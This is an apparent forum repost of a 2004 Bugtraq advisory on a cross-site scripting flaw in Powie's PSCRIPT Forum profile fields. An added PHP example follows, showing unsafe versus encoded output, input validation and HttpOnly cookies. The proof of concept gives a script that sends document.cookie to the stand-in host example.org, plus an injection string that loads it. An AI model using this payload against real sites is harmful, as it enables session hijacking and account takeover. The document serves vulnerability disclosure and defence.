Full Version: Pscript.de Pforum Xss Vulnerability
qcred11
Aug 16 2004, 08:02 PM
QUOTE


Product:            Powie's PSCRIPT Forum
Version:            All versions before 1.26
OS:                 All with PHP and mySQL.
Vendor URL:         www.pscript.de
Vendor Status:      informed
Security Risk Lvl:  high
Remote Exploit:     yes


Introduction
+----------+
pforum is a BBS, similar to phpBB or others. The author gives
users the possibility to enrich their profiles with personal data. Although
the author tries to eliminate malicious code (like unwanted HTML code)
in the inputs, two of the fields are not handled securely. Therefore it's
possible to steal cookies or do other nasty things.


More Details
+----------+
If you log in to your account, pforum saves your user id, your password
and the PHP session id. If somebody redirects you, for example using
JavaScript, he can append all this data as a query string to the target
URL. Then he can easily use your PHP session id to hijack your
pforum session. If he creates or modifies two cookies with the user id
or the crypted password, he can easily hijack your account only by visiting
the pforum.


Proof of Concept
+--------------+
Create a Javascript file and save it as bad.js (your domain name is in this
case example.org). The file contains the following code:


// bad.js
function b()
{
    location.href='example.org/compute_stolen_data.ext?'+document.cookie;
}


Edit your profile and enter the following line into the IRC Server or AIM
ID Input Box. The string has to be shorter than 100 characters.


// Input Box (without line break)
"><script src=http://example.org/bad.js></script>
<img height=0 width=0 src=foo onerror=b(); >


Post a lot. Because the picture can't be found and the onError Event Handler
catches this, every user with activated javascript will be automagically
redirected to http://example.org/compute_stolen_data.ext. All cookie values
will be appended to the URL.


Security Risk
+-----------+
Critical. You can become administrator or moderator of the forum.



Source: http://seclists.org/lists/bugtraq/2004/Aug/0219.html
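
Added example, not part of the advisory or of pforum's own code: the unescaped profile-field output described above next to an encoded version, plus input validation and an HttpOnly session cookie. The function names, the attribute context of the field and the HTTPS-only `secure` flag are assumptions.

```php
<?php
declare(strict_types=1);

// Hypothetical helper names; pforum's own code is not shown in the advisory.

// Vulnerable pattern: the stored value lands in an attribute unescaped, so a
// leading "> closes the attribute and the tag, and the rest is parsed as HTML.
function render_profile_field_unsafe(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '">';
}

// Hardened: encode for the HTML context at output time, quotes included.
function render_profile_field_safe(string $name, string $value): string
{
    $flags = ENT_QUOTES | ENT_SUBSTITUTE;
    return '<input type="text" name="' . htmlspecialchars($name, $flags, 'UTF-8')
         . '" value="' . htmlspecialchars($value, $flags, 'UTF-8') . '">';
}

// Defence in depth at input time: allowlist of host[:port], under 100 bytes.
function is_valid_irc_server(string $value): bool
{
    return strlen($value) < 100
        && preg_match('/\A[a-z0-9](?:[a-z0-9.-]*[a-z0-9])?(?::\d{1,5})?\z/i', $value) === 1;
}

// Limits the impact of any remaining XSS: script cannot read an HttpOnly cookie.
// Must run before session_start() and before any output.
session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);

// Constructed sample input: the profile string quoted in the advisory.
$input = '"><script src=http://example.org/bad.js></script>'
       . '<img height=0 width=0 src=foo onerror=b(); >';

foreach ([$input, 'irc.example.org:6667'] as $candidate) {
    echo 'accepted at input: ', var_export(is_valid_irc_server($candidate), true), PHP_EOL;
}
echo 'unsafe: ', render_profile_field_unsafe('irc_server', $input), PHP_EOL;
echo 'safe:   ', render_profile_field_safe('irc_server', $input), PHP_EOL;
```

HttpOnly only protects cookies that are set with that flag, so the user id and password cookies the advisory mentions would need it as well.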